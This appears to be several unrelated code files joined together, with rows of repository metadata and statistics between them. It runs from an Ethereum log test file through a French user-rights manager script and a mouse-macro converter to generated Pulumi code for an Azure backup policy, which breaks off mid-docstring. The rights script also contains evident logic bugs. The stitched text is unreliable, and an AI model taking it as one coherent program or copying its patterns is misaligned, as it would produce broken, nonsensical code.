contract_address='0xdF5e0e81Dff6FAF3A7e52BA697820c5e32D806A8',
abi=ERC20TOKEN_ABI,
event_name='Transfer',
argument_filters=argument_filters,
from_block=10712531,
to_block=10712753,
call_order=call_order,
)
assert len(events) == 1
expected_event = {
'address': '0xdF5e0e81Dff6FAF3A7e52BA697820c5e32D806A8',
'blockNumber': 10712731,
'data': '0x0000000000000000000000000000000000000000000001e3f60028423cff0000',
'gasPrice': 72000000000,
'gasUsed': 93339,
'logIndex': 157,
'topics': [
'0xddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef',
'0x0000000000000000000000007780e86699e941254c8f4d9b7eb08ff7e96bbe10',
'0x0000000000000000000000005dbcf33d8c2e976c6b560249878e6f1491bca25c',
],
'transactionHash': '0xca33e56e1e529dacc9aa1261c8ba9230927329eb609fbe252e5bd3c2f5f3bcc9',
'transactionIndex': 85,
}
assert_serialized_dicts_equal(
events[0],
expected_event,
same_key_length=False,
ignore_keys=[
'timeStamp', # returned from etherscan
'blockHash', # returned from web3
'removed', # returned from web3
],
)
@pytest.mark.parametrize(*ETHEREUM_TEST_PARAMETERS)
def test_get_log_and_receipt_etherscan_bad_tx_index(
ethereum_manager,
call_order,
ethereum_manager_connect_at_start,
):
"""
https://etherscan.io/tx/0x00eea6359d247c9433d32620358555a0fd3265378ff146b9511b7cff1ecb7829
contains a log entry which in etherscan has transaction index 0x.
Our code was not handling this well and was raising ValueError.
This is a regression test for that.
"""
wait_until_all_nodes_connected(
ethereum_manager_connect_at_start=ethereum_manager_connect_at_start,
ethereum=ethereum_manager,
)
# Test getting the offending log entry does not raise
argument_filters = {
'from': ZERO_ADDRESS,
'to': '0xbA215F7BE6c620dA3F8240B82741eaF3C5f5D786',
}
events = ethereum_manager.get_logs(
contract_address='0xFC4B8ED459e00e5400be803A9BB3954234FD50e3',
abi=ATOKEN_ABI,
event_name='Transfer',
argument_filters=argument_filters,
from_block=10773651,
to_block=10773653,
call_order=call_order,
)
assert len(events) == 2
assert events[0]['transactionIndex'] == 0
assert events[1]['transactionIndex'] == 0
# Test getting the transaction receipt (also containing the log entries) does not raise
# They seem to all be 0
result = ethereum_manager.get_transaction_receipt(
hexstring_to_bytes('0x00eea6359d247c9433d32620358555a0fd3265378ff146b9511b7cff1ecb7829'),
call_order=call_order,
)
assert all(x['transactionIndex'] == 0 for x in result['logs'])
def test_nodes_weight_map():
"""Test the weight map has no duplicates and adds to 100%"""
nodes_set = set()
total = ZERO
for node, value in OPEN_NODES_WEIGHT_MAP.items():
assert node not in nodes_set, f'node {str(node)} appears more than once'
nodes_set.add(node)
total += FVal(value)
assert total == ONE
def test_nodes_sets():
"""Test that all nodes sets contain the nodes they should"""
assert set(OPEN_NODES) - set({NodeName.ETHERSCAN}) == set(ETHEREUM_NODES_TO_CONNECT_AT_START) - set({NodeName.OWN}) # noqa: E501
assert set(OPEN_NODES_WEIGHT_MAP.keys()) - set({NodeName.ETHERSCAN}) == set(ETHEREUM_NODES_TO_CONNECT_AT_START) - set({NodeName.OWN}) # noqa: E501
@pytest.mark.skipif(
'CI' in os.environ,
reason='This test is only for us to figure out the speed of the open nodes',
)
def test_nodes_speed():
"""TODO"""
def _test_get_blocknumber_by_time(eth_manager, etherscan):
result = eth_manager.get_blocknumber_by_time(1577836800, etherscan=etherscan)
assert result == 9193265
def test_get_blocknumber_by_time_subgraph(ethereum_manager):
"""Queries the blocks subgraph for known block times"""
_test_get_blocknumber_by_time(ethereum_manager, False)
def test_get_blocknumber_by_time_etherscan(ethereum_manager):
"""Queries etherscan for known block times"""
_test_get_blocknumber_by_time(ethereum_manager, True)
| 71.767647
| 10,617
| 0.726569
| 4,272
| 24,401
| 4.050094
| 0.112828
| 0.807999
| 1.183909
| 1.541787
| 0.658826
| 0.643336
| 0.617848
| 0.604901
| 0.602011
| 0.580569
| 0
| 0.297456
| 0.109012
| 24,401
| 339
| 10,618
| 71.979351
| 0.498367
| 0.053481
| 0
| 0.257143
| 0
| 0.028571
| 0.594183
| 0.572708
| 0
| 1
| 0.052689
| 0.00295
| 0.117857
| 1
| 0.046429
| false
| 0
| 0.05
| 0
| 0.096429
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
86d03d171db9e5e22e691109cc59a9f0dccec6a4
| 7,981
|
py
|
Python
|
serveur/gestionDroits/rightsHandler2.py
|
PL4typus/SysNetProject17
|
283c127a3363876360bc52b54eae939c6104c6b4
|
[
"MIT"
] | null | null | null |
serveur/gestionDroits/rightsHandler2.py
|
PL4typus/SysNetProject17
|
283c127a3363876360bc52b54eae939c6104c6b4
|
[
"MIT"
] | null | null | null |
serveur/gestionDroits/rightsHandler2.py
|
PL4typus/SysNetProject17
|
283c127a3363876360bc52b54eae939c6104c6b4
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python3.4
# coding: utf-8
import sys, socket, os, time,numpy
## Fonction qui renvoie une liste de liste de la forme : [[user1,mdp1],[user2,mdp2]] ##
def lecture_fichier(fichier) : #[[nom1,mdp1],[nom2,mdp2]....]
f = open(fichier,'r')
fo = f.read(2048)
l=fo.splitlines()
for i in range(len(l)) :
l[i] = l[i].split(':')
f.close()
return l
def rightsManager(Droit,user):
PATH_INF="/home/squirrel/Documents/projets/NETWORK/projetreseau17/Authentification/passwordInf.txt"
PATH_INT="/home/squirrel/Documents/projets/NETWORK/projetreseau17/Authentification/passwordInt.txt"
PATH_MED="/home/squirrel/Documents/projets/NETWORK/projetreseau17/Authentification/passwordMed.txt"
PATH_DROITS_Inf="fichier_droitsInf.plp"
PATH_DROITS_Int="fichier_droitsInt.plp"
tab_droits={}
ans=" "
adoube=" "
fich=" "
ls = " "
check=False
if Droit=="M":
while True:
print("Modifier les droits de qui ?")
print("")
while ans not in {"Inf","I","INF","inf","i","q","Q"}:
print("(Inf)irmier \t (I)nterne \t (Q)uitter")
ans = input(">") #conn_client.recv().decode()
if ans in {"Inf","INF","inf"}:
print("Quelle personne ?")
l=lecture_fichier(PATH_INF)
for i in l:
print(i[0])
while check==False:
print("Veuillez choisir quelqu'un dans la liste ou Q pour quitter")
adoube=input(">>") #conn_client.recv().decode()
for i in l:
if (adoube == i[0]) or (adoube in {"q","Q"}):
check = True
if adoube not in {"q","Q"}:
print(adoube," a actuellement les droits suivants:")
f = open(PATH_DROITS_Inf,"r")
rights=f.read().splitlines()
f.close()
already=False
saved_i=0
for i in range(len(rights)):
rights[i]=rights[i].split(";")
for i in range(len( rights)):
if rights[i][0]==adoube:
print("Par defaut, ",rights[i][2])
saved_i=i
already=True
if already==False:
liste=[[adoube,"default",rights[0][2]]]
rights.extend(liste)
for j in range(len(rights[saved_i])):
if j%2==1:
print("Pour le fichier ",rights[saved_i][j],": ",rights[saved_i][j+1])
print("Entrez un nom de fichier puis les nouveaux droits. Ex: ficheMichu rw")
print("r : droits de lecture \t w : droits d'écriture (la personne verra le contenu du fichier lors de l'édition")
print("Entrez § pour terminer")
verdict=" "
t_verdict=rights[saved_i][1]+" "+rights[saved_i][2]
k=0
while verdict != "§":
verdict=input(">>>>>:")
if verdict != "§":
t_verdict = t_verdict+ ";"+verdict
t_verdict=t_verdict.split(";")
for i in range(len(t_verdict)):
t_verdict[i]=t_verdict[i].split(" ")
di_verdict={}
for i in range(len(t_verdict)):
for j in range(len(t_verdict[i])):
di_verdict[t_verdict[i][0]]=t_verdict[i][1]
for key in di_verdict.keys():
if key not in rights[saved_i]:
rights[saved_i]=(di_verdict.get(key))
for i in range(len(rights[saved_i])):
if rights[saved_i][i]==key:
print(rights[saved_i][i],rights[saved_i][i+1])
rights[saved_i][i+1]=di_verdict.get(key,"r")
f = open(PATH_DROITS_Inf,"w")
tampon=""
for i in range(len(rights)):
for j in range(len(rights[i])):
tampon=tampon+rights[i][j]+";"
print(tampon)
tampon=tampon+"\n"
f.write(tampon)
if ans in {"I","i"}:
print("Quelle personne ?")
l=lecture_fichier(PATH_INT)
for i in l:
print(i[0])
while check==False:
print("Veuillez choisir quelqu'un dans la liste ou Q pour quitter")
adoube=input(">>") #conn_client.recv().decode()
for i in l:
if (adoube == i[0]) or (adoube in {"q","Q"}):
check = True
if adoube not in {"q","Q"}:
print(adoube," a actuellement les droits suivants:")
f = open(PATH_DROITS_Int,"r")
rights=f.read().splitlines()
f.close()
already=False
saved_i=0
for i in range(len(rights)):
rights[i]=rights[i].split(";")
for i in range(len( rights)):
if rights[i][0]==adoube:
print("Par defaut, ",rights[i][2])
saved_i=i
already=True
if already==False:
liste=[[adoube,"default",rights[0][2]]]
rights.extend(liste)
for j in range(len(rights[saved_i])):
if j%2==1:
print("Pour le fichier ",rights[saved_i][j],": ",rights[saved_i][j+1])
print("Entrez un nom de fichier puis les nouveaux droits. Ex: ficheMichu rw")
print("r : droits de lecture \t w : droits d'écriture (la personne verra le contenu du fichier lors de l'édition")
print("Entrez § pour terminer")
verdict=" "
t_verdict=rights[saved_i][1]+" "+rights[saved_i][2]
k=0
while verdict != "§":
verdict=input(">>>>>:")
if verdict != "§":
t_verdict = t_verdict+ ";"+verdict
t_verdict=t_verdict.split(";")
for i in range(len(t_verdict)):
t_verdict[i]=t_verdict[i].split(" ")
di_verdict={}
for i in range(len(t_verdict)):
for j in range(len(t_verdict[i])):
di_verdict[t_verdict[i][0]]=t_verdict[i][1]
for key in di_verdict.keys():
if key not in rights[saved_i]:
rights[saved_i]=(di_verdict.get(key))
for i in range(len(rights[saved_i])):
if rights[saved_i][i]==key:
print(rights[saved_i][i],rights[saved_i][i+1])
rights[saved_i][i+1]=di_verdict.get(key,"r")
f = open(PATH_DROITS_Int,"w")
tampon=""
for i in range(len(rights)):
for j in range(len(rights[i])):
tampon=tampon+rights[i][j]+";"
print(tampon)
tampon=tampon+"\n"
print(tampon)
rightsManager("M","/home/squirrel/Documents/projets/NETWORK/projetreseau17/TraitementTxtFork/user")
| 42.005263
| 134
| 0.436913
| 875
| 7,981
| 3.891429
| 0.168
| 0.049339
| 0.084582
| 0.041997
| 0.824963
| 0.809985
| 0.795595
| 0.716006
| 0.716006
| 0.716006
| 0
| 0.012695
| 0.437414
| 7,981
| 189
| 135
| 42.227513
| 0.744321
| 0.028818
| 0
| 0.76129
| 0
| 0.012903
| 0.157623
| 0.049612
| 0
| 0
| 0
| 0
| 0
| 1
| 0.012903
| false
| 0.019355
| 0.006452
| 0
| 0.025806
| 0.167742
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
810a958b28619b1e48839fe78c23ec6ffae1371b
| 1,267
|
py
|
Python
|
amctologi.py
|
vsekov/LogitechMacrosHelper
|
91d5ec00060155a789a799fd3a92fa49183cea1d
|
[
"MIT"
] | null | null | null |
amctologi.py
|
vsekov/LogitechMacrosHelper
|
91d5ec00060155a789a799fd3a92fa49183cea1d
|
[
"MIT"
] | 1
|
2021-12-06T08:27:16.000Z
|
2021-12-06T08:27:16.000Z
|
amctologi.py
|
vsekov/LogitechMacrosHelper
|
91d5ec00060155a789a799fd3a92fa49183cea1d
|
[
"MIT"
] | null | null | null |
import re
s = """
Delay 23 ms
MoveR 0 3
Delay 23 ms
MoveR 0 27
Delay 23 ms
MoveR 0 3
Delay 23 ms
MoveR 0 27
Delay 23 ms
MoveR 0 3
Delay 23 ms
MoveR 0 27
Delay 23 ms
MoveR 0 3
Delay 23 ms
MoveR 0 27
Delay 23 ms
MoveR 0 3
Delay 23 ms
MoveR 0 27
Delay 23 ms
MoveR 0 3
Delay 23 ms
MoveR 0 27
Delay 23 ms
MoveR 0 3
Delay 23 ms
MoveR 0 27
Delay 23 ms
MoveR 0 3
Delay 23 ms
MoveR 0 27
Delay 23 ms
MoveR 0 3
Delay 23 ms
MoveR 0 27
Delay 23 ms
MoveR 0 3
Delay 23 ms
MoveR 0 27
Delay 23 ms
MoveR 0 3
Delay 23 ms
MoveR 0 27
Delay 23 ms
MoveR 0 3
Delay 23 ms
MoveR 0 27
Delay 23 ms
MoveR 0 3
Delay 23 ms
MoveR 0 27
Delay 23 ms
MoveR 0 3
Delay 23 ms
MoveR 0 27
Delay 23 ms
MoveR 0 1
"""
sep = s.splitlines()
# print(sep)
output=""
for i in sep:
ints = re.findall(r"[-+]?[.]?[\d]+(?:,\d\d\d)*[\.]?\d*(?:[eE][-+]?\d+)?", i)
if("Delay" in i):
# ints = [int(s) for s in i.split() if s.isdigit()]
output+=(f"Sleep({ints[0]})")+"\n"
elif("MoveR" in i):
# ints = [int(s) for s in i.split() if s.isdigit()]
output+=(f"MoveMouseRelative({ints[0]}, {ints[1]})")+"\n"
f = open("amctologi.txt", "w")
f.write(output)
f.close()
# for i in sep:
# print(i)
| 15.641975
| 81
| 0.578532
| 259
| 1,267
| 2.830116
| 0.146718
| 0.276944
| 0.356071
| 0.553888
| 0.759891
| 0.759891
| 0.759891
| 0.759891
| 0.759891
| 0.759891
| 0
| 0.149103
| 0.295975
| 1,267
| 81
| 82
| 15.641975
| 0.672646
| 0.108129
| 0
| 0.791667
| 0
| 0
| 0.75311
| 0.075598
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.013889
| 0
| 0.013889
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 10
|
812c90aabd7b8cac1b9e39908fe5c956034a7adf
| 34,402
|
py
|
Python
|
sdk/python/pulumi_azure/backup/policy_file_share.py
|
henriktao/pulumi-azure
|
f1cbcf100b42b916da36d8fe28be3a159abaf022
|
[
"ECL-2.0",
"Apache-2.0"
] | 109
|
2018-06-18T00:19:44.000Z
|
2022-02-20T05:32:57.000Z
|
sdk/python/pulumi_azure/backup/policy_file_share.py
|
henriktao/pulumi-azure
|
f1cbcf100b42b916da36d8fe28be3a159abaf022
|
[
"ECL-2.0",
"Apache-2.0"
] | 663
|
2018-06-18T21:08:46.000Z
|
2022-03-31T20:10:11.000Z
|
sdk/python/pulumi_azure/backup/policy_file_share.py
|
henriktao/pulumi-azure
|
f1cbcf100b42b916da36d8fe28be3a159abaf022
|
[
"ECL-2.0",
"Apache-2.0"
] | 41
|
2018-07-19T22:37:38.000Z
|
2022-03-14T10:56:26.000Z
|
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from .. import _utilities
from . import outputs
from ._inputs import *
__all__ = ['PolicyFileShareArgs', 'PolicyFileShare']
@pulumi.input_type
class PolicyFileShareArgs:
def __init__(__self__, *,
backup: pulumi.Input['PolicyFileShareBackupArgs'],
recovery_vault_name: pulumi.Input[str],
resource_group_name: pulumi.Input[str],
retention_daily: pulumi.Input['PolicyFileShareRetentionDailyArgs'],
name: Optional[pulumi.Input[str]] = None,
retention_monthly: Optional[pulumi.Input['PolicyFileShareRetentionMonthlyArgs']] = None,
retention_weekly: Optional[pulumi.Input['PolicyFileShareRetentionWeeklyArgs']] = None,
retention_yearly: Optional[pulumi.Input['PolicyFileShareRetentionYearlyArgs']] = None,
tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
timezone: Optional[pulumi.Input[str]] = None):
"""
The set of arguments for constructing a PolicyFileShare resource.
:param pulumi.Input['PolicyFileShareBackupArgs'] backup: Configures the Policy backup frequency and times as documented in the `backup` block below.
:param pulumi.Input[str] recovery_vault_name: Specifies the name of the Recovery Services Vault to use. Changing this forces a new resource to be created.
:param pulumi.Input[str] resource_group_name: The name of the resource group in which to create the policy. Changing this forces a new resource to be created.
:param pulumi.Input['PolicyFileShareRetentionDailyArgs'] retention_daily: Configures the policy daily retention as documented in the `retention_daily` block below.
:param pulumi.Input[str] name: Specifies the name of the policy. Changing this forces a new resource to be created.
:param pulumi.Input['PolicyFileShareRetentionMonthlyArgs'] retention_monthly: Configures the policy monthly retention as documented in the `retention_monthly` block below.
:param pulumi.Input['PolicyFileShareRetentionWeeklyArgs'] retention_weekly: Configures the policy weekly retention as documented in the `retention_weekly` block below.
:param pulumi.Input['PolicyFileShareRetentionYearlyArgs'] retention_yearly: Configures the policy yearly retention as documented in the `retention_yearly` block below.
:param pulumi.Input[str] timezone: Specifies the timezone. [the possible values are defined here](http://jackstromberg.com/2017/01/list-of-time-zones-consumed-by-azure/). Defaults to `UTC`
"""
pulumi.set(__self__, "backup", backup)
pulumi.set(__self__, "recovery_vault_name", recovery_vault_name)
pulumi.set(__self__, "resource_group_name", resource_group_name)
pulumi.set(__self__, "retention_daily", retention_daily)
if name is not None:
pulumi.set(__self__, "name", name)
if retention_monthly is not None:
pulumi.set(__self__, "retention_monthly", retention_monthly)
if retention_weekly is not None:
pulumi.set(__self__, "retention_weekly", retention_weekly)
if retention_yearly is not None:
pulumi.set(__self__, "retention_yearly", retention_yearly)
if tags is not None:
pulumi.set(__self__, "tags", tags)
if timezone is not None:
pulumi.set(__self__, "timezone", timezone)
@property
@pulumi.getter
def backup(self) -> pulumi.Input['PolicyFileShareBackupArgs']:
"""
Configures the Policy backup frequency and times as documented in the `backup` block below.
"""
return pulumi.get(self, "backup")
@backup.setter
def backup(self, value: pulumi.Input['PolicyFileShareBackupArgs']):
pulumi.set(self, "backup", value)
@property
@pulumi.getter(name="recoveryVaultName")
def recovery_vault_name(self) -> pulumi.Input[str]:
"""
Specifies the name of the Recovery Services Vault to use. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "recovery_vault_name")
@recovery_vault_name.setter
def recovery_vault_name(self, value: pulumi.Input[str]):
pulumi.set(self, "recovery_vault_name", value)
@property
@pulumi.getter(name="resourceGroupName")
def resource_group_name(self) -> pulumi.Input[str]:
"""
The name of the resource group in which to create the policy. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "resource_group_name")
@resource_group_name.setter
def resource_group_name(self, value: pulumi.Input[str]):
pulumi.set(self, "resource_group_name", value)
@property
@pulumi.getter(name="retentionDaily")
def retention_daily(self) -> pulumi.Input['PolicyFileShareRetentionDailyArgs']:
"""
Configures the policy daily retention as documented in the `retention_daily` block below.
"""
return pulumi.get(self, "retention_daily")
@retention_daily.setter
def retention_daily(self, value: pulumi.Input['PolicyFileShareRetentionDailyArgs']):
pulumi.set(self, "retention_daily", value)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
"""
Specifies the name of the policy. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@property
@pulumi.getter(name="retentionMonthly")
def retention_monthly(self) -> Optional[pulumi.Input['PolicyFileShareRetentionMonthlyArgs']]:
"""
Configures the policy monthly retention as documented in the `retention_monthly` block below.
"""
return pulumi.get(self, "retention_monthly")
@retention_monthly.setter
def retention_monthly(self, value: Optional[pulumi.Input['PolicyFileShareRetentionMonthlyArgs']]):
pulumi.set(self, "retention_monthly", value)
@property
@pulumi.getter(name="retentionWeekly")
def retention_weekly(self) -> Optional[pulumi.Input['PolicyFileShareRetentionWeeklyArgs']]:
"""
Configures the policy weekly retention as documented in the `retention_weekly` block below.
"""
return pulumi.get(self, "retention_weekly")
@retention_weekly.setter
def retention_weekly(self, value: Optional[pulumi.Input['PolicyFileShareRetentionWeeklyArgs']]):
pulumi.set(self, "retention_weekly", value)
@property
@pulumi.getter(name="retentionYearly")
def retention_yearly(self) -> Optional[pulumi.Input['PolicyFileShareRetentionYearlyArgs']]:
"""
Configures the policy yearly retention as documented in the `retention_yearly` block below.
"""
return pulumi.get(self, "retention_yearly")
@retention_yearly.setter
def retention_yearly(self, value: Optional[pulumi.Input['PolicyFileShareRetentionYearlyArgs']]):
pulumi.set(self, "retention_yearly", value)
@property
@pulumi.getter
def tags(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:
return pulumi.get(self, "tags")
@tags.setter
def tags(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]):
pulumi.set(self, "tags", value)
@property
@pulumi.getter
def timezone(self) -> Optional[pulumi.Input[str]]:
"""
Specifies the timezone. [the possible values are defined here](http://jackstromberg.com/2017/01/list-of-time-zones-consumed-by-azure/). Defaults to `UTC`
"""
return pulumi.get(self, "timezone")
@timezone.setter
def timezone(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "timezone", value)
@pulumi.input_type
class _PolicyFileShareState:
def __init__(__self__, *,
backup: Optional[pulumi.Input['PolicyFileShareBackupArgs']] = None,
name: Optional[pulumi.Input[str]] = None,
recovery_vault_name: Optional[pulumi.Input[str]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
retention_daily: Optional[pulumi.Input['PolicyFileShareRetentionDailyArgs']] = None,
retention_monthly: Optional[pulumi.Input['PolicyFileShareRetentionMonthlyArgs']] = None,
retention_weekly: Optional[pulumi.Input['PolicyFileShareRetentionWeeklyArgs']] = None,
retention_yearly: Optional[pulumi.Input['PolicyFileShareRetentionYearlyArgs']] = None,
tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
timezone: Optional[pulumi.Input[str]] = None):
"""
Input properties used for looking up and filtering PolicyFileShare resources.
:param pulumi.Input['PolicyFileShareBackupArgs'] backup: Configures the Policy backup frequency and times as documented in the `backup` block below.
:param pulumi.Input[str] name: Specifies the name of the policy. Changing this forces a new resource to be created.
:param pulumi.Input[str] recovery_vault_name: Specifies the name of the Recovery Services Vault to use. Changing this forces a new resource to be created.
:param pulumi.Input[str] resource_group_name: The name of the resource group in which to create the policy. Changing this forces a new resource to be created.
:param pulumi.Input['PolicyFileShareRetentionDailyArgs'] retention_daily: Configures the policy daily retention as documented in the `retention_daily` block below.
:param pulumi.Input['PolicyFileShareRetentionMonthlyArgs'] retention_monthly: Configures the policy monthly retention as documented in the `retention_monthly` block below.
:param pulumi.Input['PolicyFileShareRetentionWeeklyArgs'] retention_weekly: Configures the policy weekly retention as documented in the `retention_weekly` block below.
:param pulumi.Input['PolicyFileShareRetentionYearlyArgs'] retention_yearly: Configures the policy yearly retention as documented in the `retention_yearly` block below.
:param pulumi.Input[str] timezone: Specifies the timezone. [the possible values are defined here](http://jackstromberg.com/2017/01/list-of-time-zones-consumed-by-azure/). Defaults to `UTC`
"""
if backup is not None:
pulumi.set(__self__, "backup", backup)
if name is not None:
pulumi.set(__self__, "name", name)
if recovery_vault_name is not None:
pulumi.set(__self__, "recovery_vault_name", recovery_vault_name)
if resource_group_name is not None:
pulumi.set(__self__, "resource_group_name", resource_group_name)
if retention_daily is not None:
pulumi.set(__self__, "retention_daily", retention_daily)
if retention_monthly is not None:
pulumi.set(__self__, "retention_monthly", retention_monthly)
if retention_weekly is not None:
pulumi.set(__self__, "retention_weekly", retention_weekly)
if retention_yearly is not None:
pulumi.set(__self__, "retention_yearly", retention_yearly)
if tags is not None:
pulumi.set(__self__, "tags", tags)
if timezone is not None:
pulumi.set(__self__, "timezone", timezone)
@property
@pulumi.getter
def backup(self) -> Optional[pulumi.Input['PolicyFileShareBackupArgs']]:
"""
Configures the Policy backup frequency and times as documented in the `backup` block below.
"""
return pulumi.get(self, "backup")
@backup.setter
def backup(self, value: Optional[pulumi.Input['PolicyFileShareBackupArgs']]):
pulumi.set(self, "backup", value)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
"""
Specifies the name of the policy. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@property
@pulumi.getter(name="recoveryVaultName")
def recovery_vault_name(self) -> Optional[pulumi.Input[str]]:
"""
Specifies the name of the Recovery Services Vault to use. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "recovery_vault_name")
@recovery_vault_name.setter
def recovery_vault_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "recovery_vault_name", value)
@property
@pulumi.getter(name="resourceGroupName")
def resource_group_name(self) -> Optional[pulumi.Input[str]]:
"""
The name of the resource group in which to create the policy. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "resource_group_name")
@resource_group_name.setter
def resource_group_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "resource_group_name", value)
@property
@pulumi.getter(name="retentionDaily")
def retention_daily(self) -> Optional[pulumi.Input['PolicyFileShareRetentionDailyArgs']]:
"""
Configures the policy daily retention as documented in the `retention_daily` block below.
"""
return pulumi.get(self, "retention_daily")
@retention_daily.setter
def retention_daily(self, value: Optional[pulumi.Input['PolicyFileShareRetentionDailyArgs']]):
pulumi.set(self, "retention_daily", value)
@property
@pulumi.getter(name="retentionMonthly")
def retention_monthly(self) -> Optional[pulumi.Input['PolicyFileShareRetentionMonthlyArgs']]:
"""
Configures the policy monthly retention as documented in the `retention_monthly` block below.
"""
return pulumi.get(self, "retention_monthly")
@retention_monthly.setter
def retention_monthly(self, value: Optional[pulumi.Input['PolicyFileShareRetentionMonthlyArgs']]):
pulumi.set(self, "retention_monthly", value)
@property
@pulumi.getter(name="retentionWeekly")
def retention_weekly(self) -> Optional[pulumi.Input['PolicyFileShareRetentionWeeklyArgs']]:
"""
Configures the policy weekly retention as documented in the `retention_weekly` block below.
"""
return pulumi.get(self, "retention_weekly")
@retention_weekly.setter
def retention_weekly(self, value: Optional[pulumi.Input['PolicyFileShareRetentionWeeklyArgs']]):
pulumi.set(self, "retention_weekly", value)
@property
@pulumi.getter(name="retentionYearly")
def retention_yearly(self) -> Optional[pulumi.Input['PolicyFileShareRetentionYearlyArgs']]:
"""
Configures the policy yearly retention as documented in the `retention_yearly` block below.
"""
return pulumi.get(self, "retention_yearly")
@retention_yearly.setter
def retention_yearly(self, value: Optional[pulumi.Input['PolicyFileShareRetentionYearlyArgs']]):
pulumi.set(self, "retention_yearly", value)
@property
@pulumi.getter
def tags(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:
return pulumi.get(self, "tags")
@tags.setter
def tags(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]):
pulumi.set(self, "tags", value)
@property
@pulumi.getter
def timezone(self) -> Optional[pulumi.Input[str]]:
"""
Specifies the timezone. [the possible values are defined here](http://jackstromberg.com/2017/01/list-of-time-zones-consumed-by-azure/). Defaults to `UTC`
"""
return pulumi.get(self, "timezone")
@timezone.setter
def timezone(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "timezone", value)
class PolicyFileShare(pulumi.CustomResource):
@overload
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
backup: Optional[pulumi.Input[pulumi.InputType['PolicyFileShareBackupArgs']]] = None,
name: Optional[pulumi.Input[str]] = None,
recovery_vault_name: Optional[pulumi.Input[str]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
retention_daily: Optional[pulumi.Input[pulumi.InputType['PolicyFileShareRetentionDailyArgs']]] = None,
retention_monthly: Optional[pulumi.Input[pulumi.InputType['PolicyFileShareRetentionMonthlyArgs']]] = None,
retention_weekly: Optional[pulumi.Input[pulumi.InputType['PolicyFileShareRetentionWeeklyArgs']]] = None,
retention_yearly: Optional[pulumi.Input[pulumi.InputType['PolicyFileShareRetentionYearlyArgs']]] = None,
tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
timezone: Optional[pulumi.Input[str]] = None,
__props__=None):
"""
Manages an Azure File Share Backup Policy within a Recovery Services vault.
## Example Usage
```python
import pulumi
import pulumi_azure as azure
example_resource_group = azure.core.ResourceGroup("exampleResourceGroup", location="West Europe")
example_vault = azure.recoveryservices.Vault("exampleVault",
location=example_resource_group.location,
resource_group_name=example_resource_group.name,
sku="Standard")
policy = azure.backup.PolicyFileShare("policy",
resource_group_name=example_resource_group.name,
recovery_vault_name=azurerm_recovery_services_vault["vault"]["name"],
timezone="UTC",
backup=azure.backup.PolicyFileShareBackupArgs(
frequency="Daily",
time="23:00",
),
retention_daily=azure.backup.PolicyFileShareRetentionDailyArgs(
count=10,
),
retention_weekly=azure.backup.PolicyFileShareRetentionWeeklyArgs(
count=7,
weekdays=[
"Sunday",
"Wednesday",
"Friday",
"Saturday",
],
),
retention_monthly=azure.backup.PolicyFileShareRetentionMonthlyArgs(
count=7,
weekdays=[
"Sunday",
"Wednesday",
],
weeks=[
"First",
"Last",
],
),
retention_yearly=azure.backup.PolicyFileShareRetentionYearlyArgs(
count=7,
weekdays=["Sunday"],
weeks=["Last"],
months=["January"],
))
```
## Import
Azure File Share Backup Policies can be imported using the `resource id`, e.g.
```sh
$ pulumi import azure:backup/policyFileShare:PolicyFileShare policy1 /subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/group1/providers/Microsoft.RecoveryServices/vaults/example-recovery-vault/backupPolicies/policy1
```
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[pulumi.InputType['PolicyFileShareBackupArgs']] backup: Configures the Policy backup frequency and times as documented in the `backup` block below.
